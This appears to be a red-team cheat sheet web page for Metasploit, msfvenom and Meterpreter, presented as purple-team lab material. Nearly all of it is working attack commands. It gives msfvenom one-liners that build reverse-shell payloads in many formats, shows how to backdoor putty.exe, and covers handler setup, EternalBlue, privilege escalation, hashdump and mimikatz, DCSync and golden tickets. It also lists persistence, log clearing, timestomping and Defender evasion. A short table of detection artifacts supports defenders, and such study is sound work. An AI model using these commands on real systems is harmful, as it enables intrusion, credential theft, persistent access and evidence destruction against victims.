Metasploit: Quick Reference Sheet

Metasploit: Quick Reference Sheet

This entry is part 20 of 29 in the series Red Team Engagements

Views: 3

Metasploit / msfvenom / Meterpreter Cheat Sheet
msfconsole Basics
RUN

Launching & Global Commands

CommandDescription
msfconsoleStart the framework
msfconsole -qStart quietly, no banner
msfconsole -r script.rcAuto-run a resource script on start
helpList all commands
help <cmd>Help for a specific command
bannerRandom banner (harmless fun)
versionFramework version info
exit / quitLeave msfconsole
VAR

Global Variables & History

CommandDescription
setg RHOSTS 10.10.10.5Set a global var (persists across modules)
unsetg RHOSTSUnset a global var
saveSave current datastore/config
historyShow console command history
makerc out.rcDump session history to resource script
irbDrop to Ruby interactive shell
load <plugin>Load a plugin (e.g. nessus, sqlmap)
Use setg for RHOSTS/LHOST/LPORT once per engagement to avoid re-typing them for every module.
JOB

Jobs, Threads & Logging

CommandDescription
jobsList background jobs
jobs -k <id>Kill a job
jobs -KKill all jobs
spool /tmp/msf.logLog console output to file
route add <net> <mask> <sid>Route traffic through a session
sessions -lList active sessions
sessions -i <id>Interact with a session
Workspace & Database
DB

Database & Workspace Management

Database Setup
db_statusCheck DB connectivity
db_connect msf:[email protected]/msfManual DB connect
db_nmap -sV -A 10.10.10.0/24Nmap scan, results stored in DB
db_import scan.xmlImport Nmap/Nessus/Nexpose results
db_export -f xml report.xmlExport workspace data
Workspaces
workspaceList workspaces
workspace -a silent_ledgerAdd and switch workspace
workspace silent_ledgerSwitch active workspace
workspace -d old_opDelete a workspace
DAT

Querying Stored Data

Hosts, Services, Vulns, Creds
hostsList discovered hosts
hosts -RSet RHOSTS from all hosts in workspace
services -p 445Filter services by port
vulnsList discovered vulnerabilities
credsList captured credentials
creds add user:admin pass:P@ss123Manually add a credential
lootList collected loot (dumps, files)
notesList analyst notes on hosts
SRCH

Searching for Modules

search Syntax
search eternalblueKeyword search
search type:exploit platform:windows smbFiltered search
search cve:2021-34527Search by CVE
search rank:excellent name:apacheFilter by reliability rank
search date:2024 windows localRecent local privesc modules
Module Types
exploit/auxiliary/post/ payload/encoder/nop/evasion/
USE

Selecting & Inspecting Modules

Load a Module
use exploit/windows/smb/ms17_010_eternalblueLoad by full path
use 3Load by search result index
backUnload current module
Inspect Before Running
infoFull module details, references, targets
show optionsRequired/optional datastore options
show targetsValid exploit targets
show payloadsCompatible payloads for module
show advancedAdvanced tuning options
checkTest vulnerability without exploiting (safe)
Setting Options & Running
OPT

Configuring & Executing

Core Options
set RHOSTS 10.10.10.5Target host(s)
set RPORT 445Target port
set PAYLOAD windows/x64/meterpreter/reverse_tcpAttach a payload
set LHOST 10.10.10.200Listener/callback address
set LPORT 4444Listener port
set TARGET 0Explicit exploit target index
Run
exploitRun exploit (foreground)
exploit -j -zRun as background job, don’t interact
runAlias for exploit (also used for auxiliary/post)
SESS

Session Management

Working With Sessions
sessionsList all sessions
sessions -i 1Interact with session 1
sessions -u 1Upgrade shell to Meterpreter
sessions -k 1Kill session 1
sessions -KKill all sessions
sessions -C “sysinfo” -i 1Run one command on a session
background(Inside session) return to msfconsole, keep alive
Prefer exploit -j -z for engagements with multiple simultaneous targets so sessions stack up in the background.
msfvenom Syntax
VEN

Core Syntax & Flags T1027 T1204

FlagDescriptionExample
-pPayload pathwindows/x64/meterpreter/reverse_tcp
-aTarget architecturex86 / x64
–platformTarget platformwindows / linux / osx / android
-fOutput formatexe / elf / raw / psh / apk
-eEncoderx86/shikata_ga_nai
-iEncode iterations3
-bBad chars to avoid‘\x00\x0a\x0d’
-xTemplate executableputty.exe (for injection)
-kKeep template functionalityrun alongside payload
-oOutput fileshell.exe
-nNOP sled length (bytes)16
–smallestMinimize payload size 
HLP

Discovery Commands

msfvenom -l payloads # List all payloads
msfvenom -l encoders # List all encoders
msfvenom -l formats # List all output formats
msfvenom -l nops # List NOP generators
msfvenom -p windows/meterpreter/reverse_tcp –list-options # Payload-specific options
Staged payloads (e.g. windows/meterpreter/reverse_tcp) are smaller but need a matching stager handler. Stageless (windows/meterpreter_reverse_tcp) are self-contained and more IDS/AV-detectable in size.
Payload Generation One-Liners
WIN

Windows Payloads

EXE (staged Meterpreter)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f exe -o shell.exe
PowerShell (in-memory)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f psh-reflection -o shell.ps1
DLL (sideloading)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f dll -o shell.dll
HTA (phishing delivery)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f hta-psh -o shell.hta
MSI (installer-based)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f msi -o shell.msi
NIX

Linux / macOS Payloads

Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f elf -o shell.elf
Linux Shell (netcat-style)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f elf -o rshell.elf
macOS Mach-O
msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f macho -o shell.macho
Bash one-liner (no binary)
msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.200 LPORT=4444 -f raw
Python (cross-platform)
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.py
WEB

Web / Mobile Payloads

PHP Web Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.php
JSP (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.jsp
WAR (Tomcat manager deploy)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f war -o shell.war
Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -o shell.apk
ASPX (IIS deploy)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f aspx -o shell.aspx
Output Formats, Encoders & Template Injection
ENC

Encoding & Bad Character Avoidance

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -e x86/shikata_ga_nai -i 5 -b ‘\x00\x0a\x0d’ -f exe -o shell.exe
Modern AV/EDR signature-matches shikata_ga_nai easily; treat encoding as an obfuscation layer for lab exercises, not a bypass technique against production EDR.
Common Formats (-f)
exeelfmachodll rawcpythonpsh psh-reflectionhta-pshwaraspx jarvbamsi
INJ

Template / Executable Injection T1027.002

Inject into a legitimate binary
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -x putty.exe -k -f exe -o putty_backdoored.exe
Combine with encoding + multiple iterations
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -e x86/shikata_ga_nai -i 3 -x app.exe -k -f exe -o app_bd.exe
The -k flag keeps the original binary’s functionality running alongside the payload thread — useful for realistic phishing-lure simulation in a lab.
Listener / Handler Setup
HDL

multi/handler T1071

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
set ExitOnSession false # Keep listening after first catch
exploit -j -z # Background job, don’t auto-interact
Always start the handler before executing the payload on target. Match PAYLOAD, LHOST and LPORT exactly to what was used in msfvenom.
RC

Resource Scripts for Repeatable Handlers

handler.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
set ExitOnSession false
exploit -j -z
Launch with it
msfconsole -q -r handler.rc
Useful for consistent, version-controlled handler configs across repeated Operation Silent Ledger runs.
Meterpreter — Core Commands
COR

Situational Awareness

CommandDescription
sysinfoOS, hostname, architecture
getuidCurrent user context
getpidCurrent process ID
psList running processes
getprivsList enabled privileges
enumdesktopsList accessible desktops
idletimeUser idle time (for opsec timing)
screenshotCapture the active desktop
webcam_list / webcam_snapEnumerate/capture webcam
SES

Session & Shell Control

CommandDescription
backgroundSend session to background
shellDrop to native OS shell
exit / quitTerminate the Meterpreter session
irbRuby shell within session context
infoSession metadata
guidSession GUID (for reconnect)
channel -lList active I/O channels
sleep <secs>Put session to sleep (evade idle scans)
Meterpreter — Filesystem & Process
FS

Filesystem Operations T1005

Navigation
pwd / getwdPrint working directory
cd C:\\Users\\PublicChange directory
ls / dirList directory contents
lpwd / lcdLocal (attacker) working dir
Transfer
upload evil.exe C:\\Windows\\Temp\\Upload file to target
download C:\\Users\\admin\\creds.txt .Download file from target
edit config.txtEdit remote file with vim
cat notes.txtPrint file contents
rm evidence.logDelete a file (anti-forensics)
timestomp file.txt -vView/modify MACE timestamps T1070.006
PRC

Process Manipulation & Migration T1055

Process Control
psList processes (PID/PPID/arch/user)
migrate <PID>Move session into another process
kill <PID>Terminate a process
execute -f cmd.exe -i -HExecute + interact, hidden window
run post/windows/manage/migrateAuto-migrate to a stable process
Migrate into a long-lived, medium-integrity process (e.g. explorer.exe) early — avoids losing the session if the spawning process (e.g. Office macro host) closes.
Meterpreter — Network & Pivoting
NET

Network Enumeration

CommandDescription
ipconfig / ifconfigInterface details of compromised host
arpARP cache — nearby hosts
netstatActive connections (like OS netstat)
routeRouting table on target
getproxyProxy configuration in use
run post/windows/gather/enum_ad_computersAD host enumeration
PIV

Pivoting & Port Forwarding T1090

Route Traffic Through a Session
run autoroute -s 172.30.1.0/24Add pivot route via session
run autoroute -pPrint current routes
background then route add 172.30.1.0 255.255.255.0 1Manual route via session ID 1
Port Forwarding
portfwd add -l 3389 -p 3389 -r 172.30.1.10Local-to-remote forward (RDP)
portfwd listList active forwards
portfwd delete -l 3389Remove a forward
SOCKS Proxy
use auxiliary/server/socks_proxyStart SOCKS4a/5 proxy module
set SRVPORT 1080; runThen chain via proxychains
Privilege Escalation & Credential Access
ESC

Privilege Escalation T1068

Automated Escalation
getsystemTry all built-in SYSTEM techniques
getsystem -t 1Named pipe impersonation (technique 1)
run post/multi/recon/local_exploit_suggesterSuggest local privesc exploits
use exploit/windows/local/bypassuacUAC bypass module
Token Manipulation T1134
load incognitoLoad token impersonation extension
list_tokens -uList available tokens by user
impersonate_token “NORTHBRIDGE\\admin”Impersonate a captured token
rev2selfRevert to original token
CRD

Credential Access T1003

Hashdump & Mimikatz/Kiwi
hashdumpDump local SAM hashes
load kiwiLoad mimikatz-based extension
creds_allDump all available credential types
lsa_dump_samSAM database via LSA
lsa_dump_secretsLSA secrets (service account creds)
dcsync_ntlm NORTHBRIDGE\\krbtgtDCSync a specific account T1003.006
Golden/Silver Ticket T1558.001
golden_ticket_create -u admin -d northbridge.local -k <krbtgt-hash> -s <SID> -t ticket.tckForge a Golden Ticket
kerberos_ticket_use ticket.tckLoad ticket into session
kerberos_ticket_listList cached tickets
Persistence
PER

Persistence Mechanisms T1547 T1053.005

Post Modules
run post/windows/manage/persistence_exeInstall EXE persistence (registry run key/service)
run persistence -X -i 30 -p 4444 -r 10.10.10.200Legacy persistence script (autoruns at boot)
use exploit/windows/local/registry_persistenceRegistry-based persistence module
Scheduled Task / Service
shell -c “schtasks /create /tn upd /tr C:\\…\\shell.exe /sc onlogon”Scheduled task persistence
run post/windows/manage/persistence_serviceInstall as a Windows service
Track every persistence artifact you drop (registry keys, task names, service names, file paths) so cleanup and blue-team detection validation stay accurate for the exercise report.
CLN

Cleanup / Anti-Forensics T1070

CommandDescription
clearevClear Windows event logs (Security/System/App)
run event_manager -cClear specific event logs
timestomp <file> -z “MM/DD/YYYY HH:MM:SS”Set arbitrary timestamp
rm <path>Remove dropped tooling
In a lab, clearing logs deliberately breaks detection validation — only use these to test whether your monitoring stack (Wazuh/Sysmon/Splunk) actually alerts on 4-clearlogfile event ID 1102.
Post-Exploitation Modules
GTH

Gather / Recon Post Modules T1082

post/windows/gather/checkvmDetect virtualization (evasion check)
post/windows/gather/enum_logged_on_usersCurrently/recently logged on users
post/windows/gather/enum_sharesEnumerate SMB shares
post/windows/gather/credentials/credential_collectorAggregate all crackable creds
post/windows/gather/enum_domainIdentify the AD domain
post/multi/gather/envDump environment variables
post/linux/gather/enum_configsLinux config/service enumeration
MGT

Manage / Escalate Post Modules

post/multi/manage/shell_to_meterpreterUpgrade plain shell to Meterpreter
post/windows/manage/migrateAutomated stable migration
post/windows/manage/enable_rdpEnable RDP on target
post/windows/manage/killavAttempt to kill known AV processes
post/multi/recon/local_exploit_suggesterSuggest applicable local exploits
post/windows/gather/smart_hashdumpHashdump across domain-cached creds
Run post modules with run <module> from an active Meterpreter session, or use + set SESSION <id> from msfconsole.
Auxiliary Scanners & Recon
SCN

Service Scanners T1046

auxiliary/scanner/portscan/tcpBasic TCP port scan
auxiliary/scanner/smb/smb_versionIdentify SMB version/OS
auxiliary/scanner/ssh/ssh_versionSSH banner grab
auxiliary/scanner/http/http_versionHTTP server fingerprint
auxiliary/scanner/rdp/rdp_scannerRDP availability/version
AUT

Auth / Spray Modules T1110

auxiliary/scanner/smb/smb_loginSMB credential validation
auxiliary/scanner/ssh/ssh_loginSSH bruteforce/validation
auxiliary/scanner/winrm/winrm_loginWinRM credential check
auxiliary/gather/kerberos_enumusersAS-REP username enum
set BLANK_PASSWORDS falseCommon spray tuning option
EXP

Exploitation Aux

auxiliary/admin/smb/ms17_010_commandEternalBlue command exec
auxiliary/scanner/smb/smb_ms17_010EternalBlue vuln check
auxiliary/dos/…DoS modules — lab only, never live
auxiliary/spoof/nbns/nbns_responseNBNS spoofing (relay setup)
Evasion & Detection-Awareness Notes
EVA

Evasion Module & Considerations T1027

Framework Evasion Module Type
use evasion/windows/windows_defender_exeBuilt-in Defender-evasion generator
set LHOST/LPORT then generateProduces evasive binary output
Default Meterpreter reverse_tcp is heavily signatured by every modern EDR. In purple team exercises the value is in measuring detection coverage, not defeating controls — treat evasion as a way to generate detection gaps to fix, not a production bypass goal.
SIG

Common Detection Surfaces

ArtifactWhere it shows up
Named pipe\\.\pipe\msagent_xx — Sysmon Event 17/18
Process migrationSysmon Event 8 (CreateRemoteThread)
getsystemNamed pipe impersonation — Event 1/17/18
hashdumpLSASS access — Sysmon Event 10, EDR alert
PSExec-style execService creation — Event 7045/4697
clearevEvent ID 1102 (log cleared) — very high fidelity
Console Shortcuts & Tips
KEY

msfconsole Keybindings

TabAutocomplete module/command/option
Ctrl + CInterrupt current command
Ctrl + ZBackground current session
↑ / ↓Cycle command history
Ctrl + RReverse search history
?Alias for help
TIP

Practical Tips

unset allClear all set datastore options
reload_allReload all modules (after custom module edit)
editOpen current module’s source in $EDITOR
reloadReload the current module after edits
color falseDisable ANSI color (for logging/CI)
Engagement Workflow (Purple Team Lab)
WF

End-to-End Kill Chain Checklist

1
Workspace & DB Setup
workspace -a silent_ledger — keep hosts/creds/loot scoped per campaign
2
Recon & Scanning
db_nmap -sV -A target-range — feeds hosts/services tables automatically
3
Payload Generation
msfvenom -p … -f exe -o payload.exe — track hash/filename for detection scoring
4
Handler + Delivery
exploit/multi/handler backgrounded, then deliver payload via chosen initial access vector
5
Stabilize Session
migrate to a stable process, getprivs, sysinfo — confirm foothold
6
Privesc & Credential Access
getsystem, load kiwi, hashdump — map each action to a TTP for scoring
7
Lateral Movement
psexec/wmiexec modules or pass-the-hash into Server Zone hosts
8
Domain Compromise
dcsync_ntlm krbtgt, golden_ticket_create — full domain persistence
9
Cross-Reference Detections
Check Wazuh/Elastic/Splunk for each TTP fired — log gaps in the purple team tracker
10
Cleanup & Report
sessions -K, remove dropped tooling, document IOCs and detection coverage per ATT&CK ID

Red Team Engagements

HAVOC C2: COMMAND & CONTROL FRAMEWORK [PART – I]